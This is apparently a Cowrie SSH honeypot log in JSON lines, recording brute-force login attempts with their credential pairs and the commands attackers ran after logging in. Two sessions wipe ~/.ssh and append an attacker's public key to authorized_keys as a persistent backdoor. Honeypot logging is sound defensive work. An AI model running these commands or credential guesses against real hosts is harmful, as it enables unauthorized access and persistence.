{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:02:23.360543Z","src_ip":"212.227.125.160","session":"5e38378d5922"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin01","message":"login attempt [admin/admin01] failed","sensor":"my-vps","timestamp":"2025-08-26T14:02:24.928961Z","src_ip":"212.227.125.160","session":"5e38378d5922"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:02:26.336747Z","src_ip":"212.227.125.160","session":"5e38378d5922"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53002,"dst_ip":"1.2.3.4","dst_port":22,"session":"2caae1c42fa1","protocol":"ssh","message":"New connection: 217.72.205.35:53002 (1.2.3.4:22) [session: 2caae1c42fa1]","sensor":"my-vps","timestamp":"2025-08-26T14:02:58.540066Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:02:58.541986Z","src_ip":"217.72.205.35","session":"2caae1c42fa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35454,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e3bd51aad49","protocol":"ssh","message":"New connection: 212.227.235.229:35454 (1.2.3.4:22) [session: 6e3bd51aad49]","sensor":"my-vps","timestamp":"2025-08-26T14:03:08.161691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:03:08.162639Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:03:08.394481Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.login.success","username":"root","password":"Root123456","message":"login attempt [root/Root123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:03:09.356261Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:03:10.631764Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:03:10.632586Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:03:10.633673Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:03:10.865077Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:03:11.432178Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T14:03:11.432953Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T14:03:11.664856Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:03:11.665988Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56082,"dst_ip":"1.2.3.4","dst_port":22,"session":"491427cc597c","protocol":"ssh","message":"New connection: 212.227.235.229:56082 (1.2.3.4:22) [session: 491427cc597c]","sensor":"my-vps","timestamp":"2025-08-26T14:03:11.892721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:03:11.893746Z","src_ip":"212.227.235.229","session":"491427cc597c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:03:12.123522Z","src_ip":"212.227.235.229","session":"491427cc597c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:03:13.877164Z","src_ip":"212.227.235.229","session":"491427cc597c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:03:15.108082Z","src_ip":"212.227.235.229","session":"491427cc597c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56092,"dst_ip":"1.2.3.4","dst_port":22,"session":"6146f25de32e","protocol":"ssh","message":"New connection: 212.227.235.229:56092 (1.2.3.4:22) [session: 6146f25de32e]","sensor":"my-vps","timestamp":"2025-08-26T14:03:15.347293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:03:15.361269Z","src_ip":"212.227.235.229","session":"6146f25de32e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:03:15.599027Z","src_ip":"212.227.235.229","session":"6146f25de32e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:03:16.530777Z","src_ip":"212.227.235.229","session":"6146f25de32e"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:03:16.763638Z","src_ip":"212.227.235.229","session":"6e3bd51aad49"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:03:16.765857Z","src_ip":"212.227.235.229","session":"6146f25de32e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43163,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7956b59e542","protocol":"ssh","message":"New connection: 212.227.235.229:43163 (1.2.3.4:22) [session: b7956b59e542]","sensor":"my-vps","timestamp":"2025-08-26T14:03:17.270187Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39864,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c0b874f602f","protocol":"ssh","message":"New connection: 212.227.125.160:39864 (1.2.3.4:22) [session: 4c0b874f602f]","sensor":"my-vps","timestamp":"2025-08-26T14:04:18.782974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:04:18.788487Z","src_ip":"212.227.125.160","session":"4c0b874f602f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:04:19.013900Z","src_ip":"212.227.125.160","session":"4c0b874f602f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T14:04:26.820211Z","src_ip":"212.227.125.160","session":"4c0b874f602f"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:04:28.056495Z","src_ip":"212.227.125.160","session":"4c0b874f602f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58390,"dst_ip":"1.2.3.4","dst_port":22,"session":"9305493f3224","protocol":"ssh","message":"New connection: 212.227.235.229:58390 (1.2.3.4:22) [session: 9305493f3224]","sensor":"my-vps","timestamp":"2025-08-26T14:04:39.726289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:04:39.727193Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:04:39.977295Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd!@#$","message":"login attempt [root/p@ssw0rd!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:04:40.991134Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:04:41.550855Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:04:41.551571Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:04:41.552747Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:04:42.581603Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:04:43.110978Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T14:04:43.111917Z","src_ip":"212.227.235.229","session":"9305493f3224"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T14:04:43.365550Z","src_ip":"212.227.235.229","session":"9305493f3224"}
